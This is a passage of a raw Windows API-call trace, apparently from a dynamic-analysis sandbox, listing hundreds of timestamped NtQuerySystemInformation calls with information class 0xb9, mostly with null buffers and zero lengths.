NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc90, Length=0x50, ResultLength=0x0) [0269.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc90, Length=0x50, ResultLength=0x0) [0269.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc90, Length=0x50, ResultLength=0x0) [0269.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb80, Length=0x50, ResultLength=0x0) [0269.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb80, Length=0x50, ResultLength=0x0) [0269.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb80, Length=0x50, ResultLength=0x0) [0269.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb80, Length=0x50, ResultLength=0x0) [0269.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdab0, Length=0x38, ResultLength=0x0) [0269.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8e0, Length=0x28, ResultLength=0x0) [0269.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8e0, Length=0x28, ResultLength=0x0) [0269.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.150] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.150] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8e0, Length=0x28, ResultLength=0x0) [0269.150] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.150] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.150] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8e0, Length=0x28, ResultLength=0x0) [0269.150] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.150] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.150] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd950, Length=0x28, ResultLength=0x0) [0269.150] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.150] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.150] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdab0, Length=0x38, ResultLength=0x0) [0269.150] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.150] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9d0, Length=0x28, ResultLength=0x0) [0269.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9d0, Length=0x28, ResultLength=0x0) [0269.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd870, Length=0x20, ResultLength=0x0) [0269.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd7f0, Length=0x20, ResultLength=0x0) [0269.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd7f0, Length=0x20, ResultLength=0x0) [0269.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd7f0, Length=0x20, ResultLength=0x0) [0269.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdab0, Length=0x38, ResultLength=0x0) [0269.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdab0, Length=0x38, ResultLength=0x0) [0269.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd930, Length=0x20, ResultLength=0x0) [0269.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8c0, Length=0x20, ResultLength=0x0) [0269.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8c0, Length=0x20, ResultLength=0x0) [0269.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb00, Length=0x50, ResultLength=0x0) [0269.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb00, Length=0x50, ResultLength=0x0) [0269.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb00, Length=0x50, ResultLength=0x0) [0269.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9f0, Length=0x50, ResultLength=0x0) [0269.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9f0, Length=0x50, ResultLength=0x0) [0269.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9f0, Length=0x50, ResultLength=0x0) [0269.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9f0, Length=0x50, ResultLength=0x0) [0269.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc920, Length=0x38, ResultLength=0x0) [0269.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc750, Length=0x28, ResultLength=0x0) [0269.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc750, Length=0x28, ResultLength=0x0) [0269.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc750, Length=0x28, ResultLength=0x0) [0269.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc750, Length=0x28, ResultLength=0x0) [0269.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7c0, Length=0x28, ResultLength=0x0) [0269.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.180] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc920, Length=0x38, ResultLength=0x0) [0269.180] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.180] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc840, Length=0x28, ResultLength=0x0) [0269.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc840, Length=0x28, ResultLength=0x0) [0269.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x20, ResultLength=0x0) [0269.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc660, Length=0x20, ResultLength=0x0) [0269.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc660, Length=0x20, ResultLength=0x0) [0269.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc660, Length=0x20, ResultLength=0x0) [0269.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.182] NtQuerySystemInformation (SystemInformationClass=0xb9, 